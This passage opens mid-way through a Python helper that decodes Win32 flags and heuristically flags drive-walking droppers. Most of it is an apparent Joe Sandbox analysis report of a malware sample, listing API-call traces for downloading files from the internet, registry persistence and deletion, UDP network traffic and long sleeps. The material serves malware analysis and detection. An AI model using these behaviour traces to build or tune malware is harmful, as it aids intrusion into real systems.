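                   r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")

# Documented Win32 values for CreateFile, SetFileAttributes and RegOpenKeyEx.
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTR = {0x1: "READONLY", 0x2: "HIDDEN", 0x4: "SYSTEM", 0x20: "ARCHIVE", 0x80: "NORMAL"}
KEY_RIGHTS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}

class Call(NamedTuple):
    api: str
    module: str
    args: list[str]
    ref: str

def parse_calls(text: str) -> list[Call]:
    """Turn the listing into Call records; header lines such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            raw = m.group("args")
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref")))
    return calls

def _hexval(s: str) -> int | None:
    try:
        return int(s, 16)
    except ValueError:  # '?' or a string literal such as .pif
        return None

def _flags(value: int, table: dict[int, str]) -> str:
    """Render a bit-mask symbolically, keeping any bits the table does not name."""
    names = [name for bit, name in table.items() if value & bit]
    unnamed = value & ~sum(table)  # table keys are distinct single bits, so sum == OR
    return "|".join(names + ([hex(unnamed)] if unnamed else [])) or "0"

def decode(call: Call) -> str:
    """Symbolic meaning of the numeric arguments, or '' when there is nothing to decode."""
    a = call.args
    if call.api == "Sleep" and a and (ms := _hexval(a[0])) is not None:
        return f"sleep {ms} ms ({ms / 1000:.1f} s)"
    if call.api == "CreateFileA" and len(a) >= 6:
        vals = [_hexval(x) for x in (a[1], a[2], a[4], a[5])]
        if None not in vals:
            access, share, disp, attrs = vals
            return (f"access={_flags(access, ACCESS)} share={_flags(share, SHARE)} "
                    f"disposition={DISPOSITION.get(disp, hex(disp))} attrs={_flags(attrs, FILE_ATTR)}")
    if call.api == "SetFileAttributesA" and len(a) >= 2 and (v := _hexval(a[1])) is not None:
        return f"attrs={_flags(v, FILE_ATTR)}"
    if call.api == "RegOpenKeyExA" and len(a) >= 4 and (v := _hexval(a[3])) is not None:
        return f"samDesired={KEY_RIGHTS.get(v, hex(v))}"
    return ""

def flag_drive_dropper(calls: list[Call]) -> list[str]:
    """Heuristic (my assumption, not something the report states): drive enumeration
    combined with writing a HIDDEN|SYSTEM file that carries an executable extension."""
    reasons = []
    if {"GetLogicalDrives", "GetDriveTypeA"} <= {c.api for c in calls}:
        reasons.append("enumerates logical drives and checks their type")
    for c in calls:
        if c.api == "CreateFileA" and len(c.args) >= 6:
            access, disp = _hexval(c.args[1]), _hexval(c.args[4])
            if access is not None and access & 0x40000000 and disp == 4:
                reasons.append(f"opens a file GENERIC_WRITE with OPEN_ALWAYS at {c.ref}")
                break
    for c in calls:
        if c.api == "SetFileAttributesA" and len(c.args) >= 2:
            v = _hexval(c.args[1])
            if v is not None and (v & 0x6) == 0x6:
                reasons.append(f"marks a file HIDDEN|SYSTEM at {c.ref}")
                break
    exts = {c.args[1] for c in calls if c.api == "lstrcat" and len(c.args) == 2 and c.args[1].startswith(".")}
    if exts & {".exe", ".pif", ".scr", ".com"}:
        reasons.append("appends an executable extension: " + ", ".join(sorted(exts)))
    return reasons

if __name__ == "__main__":
    for c in parse_calls(SAMPLE_TRACE):
        print(c.ref, c.api, decode(c))
    print(flag_drive_dropper(parse_calls(SAMPLE_TRACE)))
```

Running it prints one decoded line per call and then the four matched reasons for the 00903210 routine; feeding it only the registry and log-read lines returns no reasons, which is the point of requiring the drive walk and the write together rather than either alone.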
APIs
• GetTickCount.KERNEL32 ref: 008FA599
• GetPrivateProfileStringA.KERNEL32(008F2114,008F2660,00000000,00000000,00000080,008F26C0), ref: 008FA5C5
• lstrlen.KERNEL32(00000000), ref: 008FA5D2
• GetTickCount.KERNEL32 ref: 008FA5EA
• wsprintfA.USER32 ref: 008FA635
• WritePrivateProfileStringA.KERNEL32(008F2114,008F2660,?,008F26C0), ref: 008FA65A
• lstrcpy.KERNEL32(44775622570,00000000), ref: 008FA66C
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: CountPrivateProfileStringTick$Writelstrcpylstrlenwsprintf
• String ID: 44775622570
• API String ID: 929466507-1790008869
• Opcode ID: 8607d8001ddd7752c23b5e6db4bc445f8d45a353c2c5056ef63a4107122de7a6
• Instruction ID: 5aa36b9e2144a2f8f87b43ec2cdedc7b132630724fb17c91ab5f9e34fb82f1bc
• Opcode Fuzzy Hash: 8607d8001ddd7752c23b5e6db4bc445f8d45a353c2c5056ef63a4107122de7a6
• Instruction Fuzzy Hash: 4A315176601119BFDF14DB64EC48BE677B9FF58700F00829AF209D32A1DE749A848F51
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(0002BF20), ref: 008F8A14
                                                                                                              • Part of subcall function 008F44CB: InterlockedExchange.KERNEL32(009090C0,?), ref: 008F44E9
                                                                                                            • Sleep.KERNEL32 ref: 008F8A33
                                                                                                            • IsBadWritePtr.KERNEL32(00000110,00000000), ref: 008F8B3E
                                                                                                            • Sleep.KERNEL32(00001770), ref: 008F8B8E
                                                                                                            • Sleep.KERNEL32(0001D4C0), ref: 008F8BB0
                                                                                                            • Sleep.KERNEL32(0043001E), ref: 008F8D9D
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F8DD0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$ExchangeExitInterlockedThreadUserWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 702981705-0
                                                                                                            • Opcode ID: 0237020418c31704ff51f7c1d85761e917a88a5eb53a7b6fda92098638a7540f
                                                                                                            • Instruction ID: 72e479733f7a582814d265fbc32a47169135fcddf4e88b798f9b770cd47bce06
                                                                                                            • Opcode Fuzzy Hash: 0237020418c31704ff51f7c1d85761e917a88a5eb53a7b6fda92098638a7540f
                                                                                                            • Instruction Fuzzy Hash: 0EB18FB1A0512CCBCB24DB64CC947BAB7B5FF44304F1085EAE609A6281DB356EC4CF99
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 009009A3
                                                                                                              • Part of subcall function 008FA677: GetTickCount.KERNEL32 ref: 008FA6C5
                                                                                                              • Part of subcall function 008FA677: GetTickCount.KERNEL32 ref: 008FA6E6
                                                                                                              • Part of subcall function 008FA677: lstrlen.KERNEL32(?,008F26B8,00000000), ref: 008FA6F8
                                                                                                              • Part of subcall function 008FA677: wsprintfA.USER32 ref: 008FA704
                                                                                                            • InternetOpenA.WININET(008F2120,00000001,00000000,00000000,00000000), ref: 00900A18
                                                                                                            • InternetOpenUrlA.WININET(?,?,00000000,00000000,84000000,00000000), ref: 00900A4A
                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00900A7F
                                                                                                            • InternetReadFile.WININET(?,?,00000400,?), ref: 00900AA5
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00900AED
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00900B5D
                                                                                                            • InternetCloseHandle.WININET(?), ref: 00900B73
                                                                                                            • InternetCloseHandle.WININET(?), ref: 00900B89
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Internet$CloseFileHandle$CountOpenTick$CreateReadWritelstrcpylstrlenwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 999627789-0
                                                                                                            • Opcode ID: f9257bd025f7c7641b69ff27dc9d838108b44dbd5a2639021080b58e88f41447
                                                                                                            • Instruction ID: 5bbb1422f0b424f8dd43d162aa752c3ecfc24c492b3bc5b82f663a83be0071cd
                                                                                                            • Opcode Fuzzy Hash: f9257bd025f7c7641b69ff27dc9d838108b44dbd5a2639021080b58e88f41447
                                                                                                            • Instruction Fuzzy Hash: 0D512971A00618AFEF34CB54DC49BEAB7B9AB84306F0046D9E249A61D1DBB45FC4CF91
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(000493E0), ref: 008F87D1
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,008F84C1,00000000,00000000,00000000), ref: 008F885C
                                                                                                              • Part of subcall function 008F41C6: RtlEnterCriticalSection.NTDLL(00909030), ref: 008F41D6
                                                                                                              • Part of subcall function 008F41C6: RtlLeaveCriticalSection.NTDLL(00909030), ref: 008F4260
                                                                                                            • Sleep.KERNEL32(00000200), ref: 008F8870
                                                                                                            • Sleep.KERNEL32(00000100), ref: 008F8884
                                                                                                            • Sleep.KERNEL32(00000100), ref: 008F889F
                                                                                                            • Sleep.KERNEL32(00000400), ref: 008F88BD
                                                                                                            • Sleep.KERNEL32(00249F00), ref: 008F88D7
                                                                                                            • RtlExitUserThread.NTDLL(00000000), ref: 008F88E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep$CriticalSectionThread$CreateEnterExitLeaveUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 485722307-0
                                                                                                            • Opcode ID: 80f9661180d048fc587356fd32b5241a2a999257c54e83adef56e26873702e9b
                                                                                                            • Instruction ID: 106379796d5d9d6d0ff807b955938ac7b94148a788cb217950ab1a5ae849522b
                                                                                                            • Opcode Fuzzy Hash: 80f9661180d048fc587356fd32b5241a2a999257c54e83adef56e26873702e9b
                                                                                                            • Instruction Fuzzy Hash: 8831ADB095421CEFEB50AB74EC497BA7B74FB00709F1041A9E305E6291CFB54985CB26
                                                                                                            APIs
                                                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 008F7203
                                                                                                            • sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 008F726D
                                                                                                            • select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 008F7345
                                                                                                            • recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 008F7374
                                                                                                            • closesocket.WS2_32(?), ref: 008F750D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: closesocketrecvfromselectsendtosocket
                                                                                                            • String ID: @
                                                                                                            • API String ID: 4198204009-2766056989
                                                                                                            • Opcode ID: b434aa31a44d693dae8ac6159c4ed3c2f978e9c7dc603361e61c5f0dda9b52c3
                                                                                                            • Instruction ID: 7b4877dc393166492e1315a6c82998e9c1786f31d168783381ffb634993c10a1
                                                                                                            • Opcode Fuzzy Hash: b434aa31a44d693dae8ac6159c4ed3c2f978e9c7dc603361e61c5f0dda9b52c3
                                                                                                            • Instruction Fuzzy Hash: 27916871D081AC9AEB28CB24DC55BF9BB75BF44310F5042E9E3A9E6280DBB05EC48F55
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNEL32(008F9F2F,008F2E8C,00000000,000F003F,008F9F2F), ref: 008F8FA0
                                                                                                            • RegEnumValueA.KERNEL32(008F9F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 008F8FD7
                                                                                                            • RegDeleteValueA.KERNEL32(008F9F2F,00000000), ref: 008F9000
                                                                                                            • RegEnumKeyExA.KERNEL32(008F9F2F,00000000,00000000,00000104,00000000,00000000,00000000,00000000), ref: 008F9038
                                                                                                            • wsprintfA.USER32 ref: 008F906B
                                                                                                            • RegDeleteKeyA.ADVAPI32(008F9F2F,00000000), ref: 008F9092
                                                                                                            • RegCloseKey.ADVAPI32(008F9F2F), ref: 008F90AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DeleteEnumValue$CloseOpenwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 2321319729-0
                                                                                                            • Opcode ID: a132d47a5117c6da6e13a016bec5107e73ebeb272db513313d6fb4f9cb4fd808
                                                                                                            • Instruction ID: f0cbc8a37211dd748f04e06386b09d8db60fd08b8c80171379dd894c4372ca75
                                                                                                            • Opcode Fuzzy Hash: a132d47a5117c6da6e13a016bec5107e73ebeb272db513313d6fb4f9cb4fd808
                                                                                                            • Instruction Fuzzy Hash: 234130B5A00648FBDF14CBA4CC84BEEB7B9BF48704F10C299E345E6180DB745A888F95
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,008F244C,00000000,000F003F,?,?), ref: 00902F03
                                                                                                            • RegSetValueExA.KERNELBASE(?,008F2488,00000000,00000004,00000002,00000004), ref: 00902F31
                                                                                                            • RegCloseKey.KERNEL32(?), ref: 00902F3E
                                                                                                            • lstrcpy.KERNEL32(00000000,008F2550), ref: 00902F99
                                                                                                            • lstrcat.KERNEL32(00000000,008F2548), ref: 00902FAC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenValuelstrcatlstrcpy
                                                                                                            • String ID: >
                                                                                                            • API String ID: 1115058322-325317158
                                                                                                            • Opcode ID: 705def7332f79bc3b7116cd6fb66a8c0be1996e2dfd8b3be2e82fbf808017804
                                                                                                            • Instruction ID: 1727ff7f528e22b4482c0b0ffa9bfdd679e81aaec693207ecc1b4d31839ae02a
                                                                                                            • Opcode Fuzzy Hash: 705def7332f79bc3b7116cd6fb66a8c0be1996e2dfd8b3be2e82fbf808017804
                                                                                                            • Instruction Fuzzy Hash: 94312DB5900214AFDB24DB54DC49BE9B379FF69340F0086CAE74966294D6B45EC4CF90
                                                                                                            APIs
                                                                                                            • lstrcpy.KERNEL32(?,?), ref: 00900BC8
                                                                                                            • GetTickCount.KERNEL32 ref: 00900BCE
                                                                                                            • lstrlen.KERNEL32(?,008F3D08,00000000), ref: 00900BE1
                                                                                                            • wsprintfA.USER32 ref: 00900BEF
                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 00900C0E
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00900C2A
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00900C37
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCountCreateDeleteHandleTicklstrcpylstrlenwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3232967151-0
                                                                                                            • Opcode ID: 34a44930f837d803eb886e4d6dd4e3efaed531e5b6550324572ec23f9074e8a0
                                                                                                            • Instruction ID: bd1ba4422d0e59851b709889111457a270070bef7402624eae89e4c5ad4cc369
                                                                                                            • Opcode Fuzzy Hash: 34a44930f837d803eb886e4d6dd4e3efaed531e5b6550324572ec23f9074e8a0
                                                                                                            • Instruction Fuzzy Hash: F111A1B5600218BBEF209B64DC4DFAA777CBF44705F0046A5F709F21D1D6749A468F54
APIs
• RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 00902E52
• RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 00902E6E
• RegCloseKey.ADVAPI32(?), ref: 00902E78
• RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 00902E8C
• RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 00902EA8
• RegCloseKey.ADVAPI32(?), ref: 00902EB2
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: CloseValue$CreateOpen
• String ID:
• API String ID: 2738932338-0
APIs
• wsprintfA.USER32 ref: 008F4C2F
• lstrcpy.KERNEL32(?,00000000), ref: 008F4CDD
• lstrcpy.KERNEL32(?,00000000), ref: 008F4D04
• RegSetValueExA.KERNELBASE(?,?,00000000,00000004,?,00000004), ref: 008F4D2E
• lstrlen.KERNEL32(?), ref: 008F4D3D
• RegSetValueExA.KERNELBASE(?,?,00000000,00000001,?,00000000), ref: 008F4D5D
• RegCloseKey.KERNEL32(?), ref: 008F4D6F
Strings
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: Valuelstrcpy$Closelstrlenwsprintf
• String ID: joneC:\Windows\
• API String ID: 3050549977-2213015650
APIs
• InterlockedIncrement.KERNEL32(009094C8), ref: 008F8500
• htons.WS2_32(00000000), ref: 008F8559
  • Part of subcall function 008F719B: socket.WS2_32(00000002,00000002,00000011), ref: 008F7203
  • Part of subcall function 008F719B: sendto.WS2_32(?,?,00000000,00000000,00000000,00000010), ref: 008F726D
  • Part of subcall function 008F719B: select.WS2_32(?,00000000,00000000,00000000,0000000F), ref: 008F7345
• GetTickCount.KERNEL32 ref: 008F85C1
  • Part of subcall function 008F719B: recvfrom.WS2_32(?,?,00001000,00000000,00000000,00000010), ref: 008F7374
  • Part of subcall function 008F719B: closesocket.WS2_32(?), ref: 008F750D
• InterlockedDecrement.KERNEL32(009094C8), ref: 008F86EA
• RtlExitUserThread.NTDLL(00000000), ref: 008F86F2
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: Interlocked$CountDecrementExitIncrementThreadTickUserclosesockethtonsrecvfromselectsendtosocket
• String ID:
• API String ID: 1469894868-0
APIs
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 00901DD7
• RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 00901E14
• GetFileAttributesA.KERNEL32(00000000), ref: 00901E3D
• Sleep.KERNEL32(00000100), ref: 00901E73
• RegCloseKey.ADVAPI32(?), ref: 00901E90
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: AttributesCloseEnumFileOpenSleepValue
• String ID:
• API String ID: 684116133-0
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
Similarity
• API ID: ferrorfprintffread
• String ID: error reading file
• API String ID: 1755398252-2448569628
APIs
• GlobalAlloc.KERNEL32(00000040,00014000), ref: 00902801
  • Part of subcall function 008FC89A: MapViewOfFile.KERNEL32(000001C8,00000006,00000000,00000000,00015400), ref: 008FC8D1
  • Part of subcall function 008FC89A: UnmapViewOfFile.KERNEL32(00000000), ref: 008FC900
• GlobalFree.KERNEL32(?), ref: 00902849
• Sleep.KERNEL32(00002800), ref: 00902924
• RtlExitUserThread.NTDLL(00000000), ref: 00902947
Memory Dump Source
• Source File: 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097A000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.000000000097D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4231012043.0000000000985000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_RHxJqGoGFB.jbxd
Similarity
• API ID: FileGlobalView$AllocExitFreeSleepThreadUnmapUser
• String ID:
• API String ID: 2983513495-0
APIs
• _controlfp.MSVCRT ref: 004012FE
• __set_app_type.MSVCRT ref: 0040130C
• __getmainargs.MSVCRT ref: 0040132A
  • Part of subcall function 00401000: fclose.MSVCRT ref: 00401173
  • Part of subcall function 00401000: exit.MSVCRT ref: 00401181
• exit.MSVCRT ref: 0040134D
Memory Dump Source
• Source File: 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4168525358.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_RHxJqGoGFB.jbxd
Similarity
• API ID: exit$__getmainargs__set_app_type_controlfpfclose
• String ID:
• API String ID: 3616723909-0
APIs
• Sleep.KERNEL32(00001000), ref: 00901EA3
• RtlExitUserThread.NTDLL(00000000), ref: 00901EEA
  • Part of subcall function 00901D8F: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00000009,?), ref: 00901DD7
  • Part of subcall function 00901D8F: RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 00901E14
  • Part of subcall function 00901D8F: RegCloseKey.ADVAPI32(?), ref: 00901E90
